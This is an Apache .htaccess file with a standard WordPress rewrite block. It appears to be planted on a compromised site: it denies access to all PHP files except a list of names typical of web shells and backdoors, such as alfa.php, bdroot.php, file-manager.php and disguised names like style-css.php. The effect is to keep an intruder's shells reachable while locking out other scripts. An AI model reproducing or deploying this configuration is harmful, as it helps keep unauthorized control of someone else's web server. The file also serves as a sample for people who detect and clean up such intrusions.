<FilesMatch ".*\.(phtml|php|PhP|php5|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(alfa.php|hp1.php|hp2.php|hp3.php|hp4.php|dark.php|root.php|bdroot.php|wp-content-css.php|style-css.php|3PJcpMFsD8B.php|5PJcpMFsD8B.php|file-manager.php|index.php|bdx.php)$">
Order allow,deny
Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>